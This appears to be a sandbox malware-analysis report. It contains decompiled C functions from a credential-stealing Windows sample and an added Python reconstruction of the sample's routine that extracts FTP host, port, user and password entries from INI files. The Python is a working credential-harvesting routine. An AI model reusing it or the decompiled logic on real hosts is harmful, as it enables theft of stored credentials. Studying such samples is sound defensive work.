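The loop in E004136DC above enumerates an INI file's section names with a NULL-section GetPrivateProfileStringW call, then for each section reads one string key, one integer key with default 0x15 (21, the FTP control port), and two further string keys, and only keeps entries whose port survives the unsigned (port - 1) <= 0xfffe test. The Python below is an added example, not code from the sample or from Joe Sandbox, that reproduces that selection logic over a constructed INI so an analyst can see which entries a file of that shape would yield. The key names, the reading of the four values as host, port, user and password, and the treatment of the post-read step E004135CF as "the value must be non-empty" are assumptions; GetPrivateProfileIntW's parse rule (missing key gives the default, no leading digits gives 0) is emulated in profile_int.

```python
import configparser
import re

DEFAULT_PORT = 0x15   # 21: the default E004136DC hands to GetPrivateProfileIntW
PORT_MAX = 0xFFFF     # the unsigned (port - 1) <= 0xFFFE test accepts exactly 1..65535

# Assumed key names: the real ones are decrypted at runtime by E004159A4 from
# string IDs 0x5c..0x5f and are not visible in the dump.
KEYS = {"host": "Host", "port": "Port", "user": "User", "password": "Pass"}

# Constructed sample input; not taken from the analysed file.
SAMPLE_INI = """\
; constructed sample
[prod-ftp]
Host=ftp.example.test
Port=2121
User=deploy
Pass=s3cret

[no-port-given]
Host=10.0.0.5
User=backup
Pass=hunter2

[bad-port]
Host=10.0.0.6
Port=70000
User=x
Pass=y

[incomplete]
Host=10.0.0.7
Port=21
"""


def profile_int(text, default):
    """GetPrivateProfileIntW semantics: missing key -> default, no leading digits -> 0."""
    if text is None:
        return default
    m = re.match(r"\s*[+-]?\d+", text)
    return int(m.group()) if m else 0


def harvest_sections(ini_text, keys=KEYS):
    """Walk every section the way the loop between labels L8 and L17 does; keep complete entries."""
    # optionxform lowercases option names, which matches the case-insensitive INI API.
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(ini_text)
    found = []
    for section in cp.sections():            # the NULL-section GetPrivateProfileStringW pass
        host = cp.get(section, keys["host"], fallback=None)
        if not host:
            continue                         # first per-section read returned 0 chars
        port = profile_int(cp.get(section, keys["port"], fallback=None), DEFAULT_PORT)
        if not (1 <= port <= PORT_MAX):
            continue                         # fails the (port - 1) <= 0xFFFE check
        user = cp.get(section, keys["user"], fallback=None)
        password = cp.get(section, keys["password"], fallback=None)
        if not user or not password:
            continue                         # the remaining reads must also return data
        found.append({"section": section, "host": host, "port": port,
                      "user": user, "password": password})
    return found
```

On the constructed input only prod-ftp (port 2121) and no-port-given (port 21 by default) survive; bad-port fails the range test and incomplete lacks the last two keys. The same walk, pointed at a real client's INI on an infected host, is what decides which entries get formatted through the template string 0x55 and appended to the caller's buffer.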

    C-Code - Quality: 96%
    			E0041C298(void* __ecx, signed int __edx, void** __esi, long _a4) {
    				char _v5;
    				void _v16;
    				struct _OVERLAPPED* _v24;
    				struct _OVERLAPPED* _v28;
    				signed int _v32;
    				signed int _v36;
    				void* _t29;
    				signed int _t31;
    				int _t38;
    				int _t39;
    				signed int _t41;
    				int _t42;
    				int _t45;
    				intOrPtr _t48;
    				void* _t49;
    				signed int _t53;
    				struct _OVERLAPPED* _t54;
    				void** _t56;
    
    				_t56 = __esi;
    				_t53 = __edx;
    				_t49 = __ecx;
    				_t54 = 0;
    				_v5 = 0;
    				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0); // GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL
    				 *__esi = _t29;
    				if(_t29 != 0xffffffff) {
    					_t31 = E0041B75E(_t49, _t29);
    					_v36 = _t31;
    					_v32 = _t53;
    					if((_t31 & _t53) == 0xffffffff) {
    						L4:
    						CloseHandle( *_t56);
    						 *_t56 =  *_t56 | 0xffffffff;
    					} else {
    						if((_t31 | _t53) == 0) {
    							L18:
    							_t56[2] = _t56[2] | 0xffffffff;
    							_t25 =  &(_t56[3]);
    							 *_t25 = _t56[3] | 0xffffffff;
    							__eflags =  *_t25;
    							_v5 = 1;
    							E0041B70E( *_t56, _t54, _t54, _t54);
    						} else {
    							_v28 = 0;
    							_v24 = 0;
    							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
    								while(1) {
    									__eflags = _a4 - _t54;
    									if(_a4 == _t54) {
    										goto L18;
    									}
    									__eflags = _a4 - 5;
    									if(_a4 != 5) {
    										L16:
    										_t38 = E0041B70E( *_t56, _v28, _v24, _t54);
    										__eflags = _t38;
    										if(_t38 == 0) {
    											goto L4;
    										} else {
    											_t39 = SetEndOfFile( *_t56);
    											__eflags = _t39;
    											if(_t39 == 0) {
    												goto L4;
    											} else {
    												goto L18;
    											}
    										}
    									} else {
    										_t41 = _v16 ^ _t56[4];
    										asm("adc edi, [ebp-0x14]");
    										_t48 = _t41 + _v28 + 5;
    										asm("adc edi, ecx");
    										_v16 = _t41;
    										__eflags = 0 - _v32;
    										if(__eflags > 0) {
    											L15:
    											_t54 = 0;
    											__eflags = 0;
    											goto L16;
    										} else {
    											if(__eflags < 0) {
    												L11:
    												__eflags = _t41 - 0xa00000;
    												if(_t41 > 0xa00000) { // decoded record length over 10 MiB: treat the chain as broken from this record on
    													goto L15;
    												} else {
    													_t42 = E0041B70E( *_t56, _t41, 0, 1); // skip the record body: (handle, low, high, 1 = FILE_CURRENT), a SetFilePointer-style wrapper (inferred from its three call sites here)
    													__eflags = _t42;
    													if(_t42 == 0) {
    														goto L4;
    													} else {
    														_v28 = _t48;
    														_v24 = 0;
    														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
    														__eflags = _t45;
    														if(_t45 != 0) {
    															_t54 = 0;
    															__eflags = 0;
    															continue;
    														} else {
    															goto L4;
    														}
    													}
    												}
    											} else {
    												__eflags = _t48 - _v36;
    												if(_t48 > _v36) {
    													goto L15;
    												} else {
    													goto L11;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    								goto L18;
    							} else {
    								goto L4;
    							}
    						}
    					}
    				}
    				L19:
    				return _v5;
    			}

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,004050D3,?,?,?,00000102,?), ref: 0041C2B9
      • Part of subcall function 0041B75E: GetFileSizeEx.KERNEL32(00000000,00000000,?,?,?,0041C2D0,00000000,?,004050D3,?,?,?,00000102,?), ref: 0041B76A
    • ReadFile.KERNEL32(?,?,00000005,?,00000000,00000000,?,004050D3,?,?,?,00000102,?), ref: 0041C2FA
    • CloseHandle.KERNEL32(?,00000000,?,004050D3,?,?,?,00000102,?), ref: 0041C306
    • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001,?,004050D3,?,?,?,00000102,?), ref: 0041C375
    • SetEndOfFile.KERNEL32(?,?,?,00000102,00000000,?,004050D3,?,?,?,00000102,?), ref: 0041C39B
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: 641f2e7e2a29685bd516cc833ff87fd08173eba113274ac5a158f56dcc9b6a08
    • Instruction ID: 3a27971000b381c6d623ff787edcd5426a78ac4eb5a83b3cb5d8e16854652d36
    • Opcode Fuzzy Hash: 641f2e7e2a29685bd516cc833ff87fd08173eba113274ac5a158f56dcc9b6a08
    • Instruction Fuzzy Hash: 0341D534940208AFDF208FA5CC85BEFBBB5EF88714F10861AF965E22A0D3394581CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0041177E(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
    				intOrPtr _v28;
    				signed int _v44;
    				char _v52;
    				intOrPtr _v56;
    				char _v61;
    				intOrPtr _v64;
    				signed int _v72;
    				intOrPtr _v76;
    				char _v77;
    				intOrPtr _v84;
    				intOrPtr _v85;
    				char _v89;
    				void* __esi;
    				char _t31;
    				intOrPtr _t32;
    				char* _t37;
    				intOrPtr _t44;
    				intOrPtr* _t58;
    				intOrPtr _t62;
    				intOrPtr* _t63;
    				intOrPtr _t65;
    
    				_t63 = __edi;
    				ResetEvent(_a8);
    				_t31 = E004163F1(0x1000);
    				_t65 = 0;
    				_v52 = _t31;
    				if(_t31 != 0) {
    					_t58 = __imp__InternetSetStatusCallbackW;
    					_t32 =  *_t58(_a4, E00411735);
    					_t62 = 0x28;
    					_v56 = _t32;
    					 *_a12 = 0;
    					 *__edi = 0;
    					_v61 = 1;
    					E004164D4( &_v52,  &_v52, 0, _t62);
    					_v64 = _t62;
    					_v44 = _v72;
    					while(1) {
    						L3:
    						_t37 =  &_v52;
    						_v28 = 0x1000;
    						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
    						if(_t37 == 0) {
    							break;
    						}
    						if(_v44 != _t65) {
    							_t67 = _a12;
    							if(E004163AC( *_t63 + _v44, _a12) == 0) {
    								L9:
    								_v77 = 0;
    							} else {
    								E0041645D( *_t67 +  *_t63, _v76, _v44);
    								 *_t63 =  *_t63 + _v56;
    								_t65 = 0;
    								continue;
    							}
    						}
    						L10:
    						asm("sbb eax, eax");
    						 *_t58(_a4,  ~(_v72 + 1) & _v72);
    						E00416421(_v84);
    						if(_v89 == 0) {
    							E00416421( *_a12);
    						}
    						_t44 = _v85;
    						goto L13;
    					}
    					if(GetLastError() != 0x3e5) {
    						goto L9;
    					} else {
    						E00419B8E( &_a8);
    						goto L3;
    					}
    					goto L10;
    				} else {
    					E00416421(0);
    					_t44 = 0;
    				}
    				L13:
    				return _t44;
    			}

    APIs
    • ResetEvent.KERNEL32(?), ref: 0041178C
    • InternetSetStatusCallbackW.WININET(?,00411735), ref: 004117C1
    • InternetReadFileExA.WININET ref: 00411801
    • GetLastError.KERNEL32 ref: 0041180B
    • InternetSetStatusCallbackW.WININET(?,?), ref: 0041186F
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
    • String ID:
    • API String ID: 4044253124-0
    • Opcode ID: fd18615733225a20aa3a314188140ba63560497f87dda7cd07e5c322a32010a2
    • Instruction ID: ef24eefe269be4bdbb3d4708b88f2377c86c4d40e504190afa2be49e483ef1ae
    • Opcode Fuzzy Hash: fd18615733225a20aa3a314188140ba63560497f87dda7cd07e5c322a32010a2
    • Instruction Fuzzy Hash: AA318D31508355AFCB11EFA4DC80A9ABBE8FF48344F00492EF994D7261D738C994DB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C693(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    				char _v32;
    				void _v360;
    				short _v880;
    				void* __edi;
    				void* __esi;
    				void* _t18;
    				void* _t25;
    				void* _t26;
    				long _t39;
    				void* _t42;
    				void* _t44;
    				long _t47;
    
    				_t48 =  &_v32;
    				_t18 = 0x2b;
    				_v16 = __edx;
    				_t44 = __ecx;
    				E004159A4(_t18,  &_v32);
    				if(E0041BCB4(_t48,  &_v880, _t44) == 0) {
    					L11:
    					return 1;
    				}
    				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
    				_v8 = _t25;
    				if(_t25 == 0xffffffff) {
    					goto L11;
    				}
    				_t26 = 0x30;
    				_t39 = 0;
    				E0041596E(_t26,  &_v360);
    				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
    					L9:
    					FlushFileBuffers(_v8);
    					CloseHandle(_v8);
    					if(_t39 == 0) {
    						E0041B785( &_v880);
    					}
    					goto L11;
    				} else {
    					_t42 = _v16;
    					if(_t42 == 0) {
    						L7:
    						_t39 = 1;
    						goto L9;
    					}
    					_t47 = E00416F5E(_t42);
    					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
    						_t39 = 0;
    						goto L9;
    					} else {
    						goto L7;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040C6DE
    • WriteFile.KERNEL32(0040C67B,?,00000146,?,00000000,00000000), ref: 0040C71C
    • WriteFile.KERNEL32(0040C67B,?,00000000,?,00000000), ref: 0040C740
    • FlushFileBuffers.KERNEL32(0040C67B), ref: 0040C754
    • CloseHandle.KERNEL32(0040C67B), ref: 0040C75D
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
    • String ID:
    • API String ID: 2459967240-0
    • Opcode ID: 4647fc22ef64bb527a4baeff5cc89cda7118283dfa65c5f17ddde66c96f6940d
    • Instruction ID: a3de2f1a3e6bd31bfb4ea313578625639b0af57ba54bee6c8eb3d6cd6bede5da
    • Opcode Fuzzy Hash: 4647fc22ef64bb527a4baeff5cc89cda7118283dfa65c5f17ddde66c96f6940d
    • Instruction Fuzzy Hash: 0421BA31940119FBCF20ABA18D85FEFBBBDAF45754F1042A6A504F3190D7359A45CEA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409662(struct HWND__* __ecx, intOrPtr* __edx) {
    				struct tagRECT _v24;
    				char _v28;
    				struct HWND__* _v32;
    				intOrPtr _v36;
    				struct HWND__* _v40;
    				void* __edi;
    				intOrPtr _t29;
    				signed int _t30;
    				RECT* _t52;
    				signed int _t54;
    				intOrPtr* _t61;
    
    				_t55 = __edx;
    				_t61 = __edx;
    				 *( *(__edx + 0x14)) = 0x3c;
    				_v32 = __ecx;
    				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
    					L12:
    					return 1;
    				}
    				_t29 =  *((intOrPtr*)(_t61 + 0x14));
    				_t54 =  *(_t29 + 0x24);
    				if((_t54 & 0x40000000) == 0) {
    					_t52 =  *_t61 + 0x24;
    				} else {
    					_t52 = _t61 + 4;
    				}
    				if((_t54 & 0x10000000) == 0) {
    					_t30 = 0;
    					goto L9;
    				} else {
    					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
    						L10:
    						E004094F1( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
    						_v36 =  *_t61;
    						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
    						if(GetTopWindow(_v40) != 0) {
    							E0041AB2E( &_v28, _t35);
    						}
    						goto L12;
    					}
    					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
    						goto L12;
    					}
    					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
    					L9:
    					if(_t30 == 0) {
    						goto L12;
    					}
    					goto L10;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Rect$IntersectWindow$EmptyInfo
    • String ID:
    • API String ID: 1664082778-0
    • Opcode ID: b74ee9ef46f3859367229faed03e54f6a7085f8f5c06862896f5b8c33be02d13
    • Instruction ID: 461b42e4dd6eb344ec22d4ee4e76328b959bd1d8cb4e8704e44cdf310f582c8a
    • Opcode Fuzzy Hash: b74ee9ef46f3859367229faed03e54f6a7085f8f5c06862896f5b8c33be02d13
    • Instruction Fuzzy Hash: A7218EB21043019BD720DF29D980E57B7ECAF48754B040A2AF882E3292D739EC05DB75
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00415A5B(void* __ecx, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v104;
    				char _v204;
    				char _v724;
    				void* __edi;
    				intOrPtr _t18;
    				void* _t26;
    				void* _t40;
    				WCHAR* _t43;
    
    				_t40 = __ecx;
    				SetThreadPriority(GetCurrentThread(), 0);
    				_t18 = E0040679A(_t40, 0x19367402, 1);
    				_v12 = _t18;
    				if(_t18 != 0) {
    					E00406762(0xff220829,  &_v204, 0);
    					_t43 =  &_v724;
    					E00406AB8(_t40, _t43, __esi, 1);
    					PathQuoteSpacesW(_t43);
    					_t41 = _t43;
    					_v8 = E00416F70(_t43);
    					if(E004068C0() == 0) {
    						L7:
    						E00419BF4(_v12);
    						return 0;
    					}
    					_push(__esi);
    					_t26 = 3;
    					E004159A4(_t26,  &_v104);
    					if(WaitForSingleObject( *0x422e04, 0xc8) != 0x102) {
    						L6:
    						goto L7;
    					}
    					_v8 = _v8 + _v8 + 2;
    					do {
    						E0041A6A0(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
    					} while (WaitForSingleObject( *0x422e04, 0xc8) == 0x102);
    					goto L6;
    				}
    				return _t18 + 1;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 00415A66
    • SetThreadPriority.KERNEL32(00000000), ref: 00415A6D
      • Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB
    • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 00415AB0
    • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 00415AE8
    • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 00415B1E
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
    • String ID:
    • API String ID: 123286213-0
    • Opcode ID: f76db52bef70e0f299830cdfa44c895cc3f0f0ecc88f06d876867b5009dbd7cc
    • Instruction ID: 3648b04176be29fb63c151402de928900eaf7c72da27c008d8ae4d6e3bba6211
    • Opcode Fuzzy Hash: f76db52bef70e0f299830cdfa44c895cc3f0f0ecc88f06d876867b5009dbd7cc
    • Instruction Fuzzy Hash: 45218071900208AEEF10EBA0DD85FEE77BDEF44348F500066F505FB151DA78AE858B59
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000002,00000000), ref: 00419958
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00419982
    • WSAGetLastError.WS2_32(?,00000000), ref: 00419989
    • WSAIoctl.WS2_32(?,48000016,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004199B5
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    • closesocket.WS2_32(?), ref: 004199C9
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
    • String ID:
    • API String ID: 2355469559-0
    • Opcode ID: ab3abdf98109eacb7878296e987c9750da56fa20fd3d4812d25ea2e476a5cbc7
    • Instruction ID: f05d75a439ab7acb90d85e409405974e210e1f739583e0d08af359a4210dc9b4
    • Opcode Fuzzy Hash: ab3abdf98109eacb7878296e987c9750da56fa20fd3d4812d25ea2e476a5cbc7
    • Instruction Fuzzy Hash: EE1151B1801128BFDB20AFA6DD49CDF7E6CEF453A4B104129F905A6264D6349E81DAE4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00409268(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
    				int _t20;
    				signed int _t21;
    				struct HWND__* _t28;
    				char* _t32;
    
    				_t28 = _a4;
    				if(( *0x422940 & 0x00000004) == 0 || E004068C0() == 0) {
    					L9:
    					return GetUpdateRect(_t28, _a8, _a12);
    				} else {
    					_t32 = TlsGetValue( *0x422e14);
    					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
    						goto L9;
    					} else {
    						if(_a8 != 0) {
    							_t6 = _t32 + 0xc; // 0xc
    							E0041645D( &_a8, _t6, 0x10);
    						}
    						if(_a12 != 0) {
    							_t20 = SaveDC( *(_t32 + 8));
    							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
    							RestoreDC( *(_t32 + 8), _t20);
    						}
    						 *_t32 = 1;
    						return 1;
    					}
    				}
    			}

    APIs
    • GetUpdateRect.USER32 ref: 004092EF
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • TlsGetValue.KERNEL32 ref: 00409288
    • SaveDC.GDI32(?), ref: 004092B8
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 004092C8
    • RestoreDC.GDI32(?,00000000), ref: 004092DA
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: 9e9ae5218391791d56f668cdf34718d154630864547899dbd5825e49e1a160e5
    • Instruction ID: b5c373e2439138a5cc5340ae34721950d10d8ca43e46a885cdd8b012fc9de0b9
    • Opcode Fuzzy Hash: 9e9ae5218391791d56f668cdf34718d154630864547899dbd5825e49e1a160e5
    • Instruction Fuzzy Hash: AD11A332000305BBCB215F21DD88F977BA8EB05315F00497AF996A21B2C7359854CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040945D() {
    				struct tagMSG _v32;
    				signed int _t12;
    				intOrPtr _t15;
    				char _t17;
    				intOrPtr _t19;
    				void* _t21;
    
    				SetThreadPriority(GetCurrentThread(), 1);
    				SetEvent( *0x422e1c);
    				while(1) {
    					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
    					if(_t12 == 0xffffffff) {
    						break;
    					}
    					__eflags = _t12;
    					if(_t12 == 0) {
    						break;
    					} else {
    						__eflags = _v32.message -  *0x422e18; // 0x0
    						if(__eflags == 0) {
    							__eflags = _v32.wParam - 0xfffffffc;
    							if(_v32.wParam == 0xfffffffc) {
    								_t15 =  *0x422e20; // 0x0
    								__eflags = _t15 + 0x114;
    								_t17 = E00408D10(_t15 + 0x114, _t19, _t21, 0x422e10, _v32.lParam, 1);
    								_t19 =  *0x422e20; // 0x0
    								 *((char*)(_t19 + 0x124)) = _t17;
    								SetEvent( *0x422e1c);
    							}
    						}
    						continue;
    					}
    				}
    				return _t12 & 0xffffff00 | _t12 == 0x00000000;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 0040946A
    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00407339), ref: 00409471
    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00407339), ref: 00409483
    • SetEvent.KERNEL32(00422E10,?,00000001), ref: 004094D0
    • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 004094DD
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EventThread$CurrentMessagePriority
    • String ID:
    • API String ID: 3943651903-0
    • Opcode ID: c057419ae2c202cbb70b75038bb14a3a1dd70d8cf89247b0c48932de6c76f899
    • Instruction ID: 9d6a5be7b9007c6607e49dc6770454fdb0389a6fb524e1d04b32ba85218d345a
    • Opcode Fuzzy Hash: c057419ae2c202cbb70b75038bb14a3a1dd70d8cf89247b0c48932de6c76f899
    • Instruction Fuzzy Hash: F7019231608204BBDB20AB64EE05B567B64AB84330F54073AF960B71F1C6B59C62DB9D
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,7743A660,004079BE,00000000), ref: 0040758B
    • ReleaseMutex.KERNEL32(?), ref: 004075BF
    • IsWindow.USER32(?), ref: 004075C6
    • PostMessageW.USER32(?,00000215,00000000,?), ref: 004075E0
    • SendMessageW.USER32(?,00000215,00000000,?), ref: 004075E8
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
    • String ID:
    • API String ID: 794275546-0
    • Opcode ID: 31d3a91f66b1e39a8fa54b42a6178d81394c13624e3cfd5f2e86ab1d90ec2a8f
    • Instruction ID: 6e555f7b4e24c72762f6169ba14370e50367818c9a47a36141325bf2e7140198
    • Opcode Fuzzy Hash: 31d3a91f66b1e39a8fa54b42a6178d81394c13624e3cfd5f2e86ab1d90ec2a8f
    • Instruction Fuzzy Hash: 90F03C74508300AFD3209F24ED48DA6BBB5FB88711B044ABDF896E37B0C770A844CB26
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A7A0(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				signed int _t56;
    				WCHAR* _t57;
    				short* _t59;
    				signed short _t71;
    				char* _t77;
    				signed int _t84;
    				signed short* _t85;
    				signed int _t87;
    				intOrPtr _t88;
    				void* _t89;
    
    				_t87 = E004177A6(__eax & 0x000000ff, __ecx & 0x000000ff);
    				_v16 = _t87;
    				_t56 = E0041775A();
    				_t77 = "bcdfghklmnpqrstvwxz";
    				if((_t56 & 0x00000100) == 0) {
    					_v32 = "aeiouy";
    					_v28 = _t77;
    				} else {
    					_v32 = _t77;
    					_v28 = "aeiouy";
    				}
    				_t84 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(_t87 > 0) {
    					_v20 = _a4 & 0x00000004;
    					do {
    						if(_v8 == 2) {
    							if((E0041775A() & 0x00000100) == 0) {
    								_v32 = "aeiouy";
    								_v28 = _t77;
    							} else {
    								_v32 = _t77;
    								_v28 = "aeiouy";
    							}
    							_v8 = _v8 & 0x00000000;
    						}
    						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
    						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
    						if(_v20 == 0 || _t84 - _v12 <= 1 || (E0041775A() & 0x00000101) != 0x101) {
    							_t71 =  *((char*)(E004177A6(_v24 - 1, 0) + _t88));
    						} else {
    							_t71 = 0x20;
    							_v12 = _t84;
    						}
    						_a8[_t84] = _t71;
    						_t84 = _t84 + 1;
    						_v8 = _v8 + 1;
    					} while (_t84 < _v16);
    					_t87 = _v16;
    				}
    				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
    					_t85 = _a8;
    				} else {
    					_t85 = _a8;
    					_t59 = _t85 + _t87 * 2 - 2;
    					while( *_t59 == 0x20) {
    						_t59 = _t59 - 2;
    						_t87 = _t87 - 1;
    						if(_t87 != 0) {
    							continue;
    						} else {
    						}
    						goto L24;
    					}
    				}
    				L24:
    				_t57 = 0;
    				_t85[_t87] = 0;
    				if((_a4 & 0x00000002) != 0) {
    					_t57 = CharUpperW( *_t85 & 0x0000ffff);
    					 *_t85 = 0;
    				}
    				return _t57;
    			}

    APIs
      • Part of subcall function 0041775A: GetTickCount.KERNEL32 ref: 0041775A
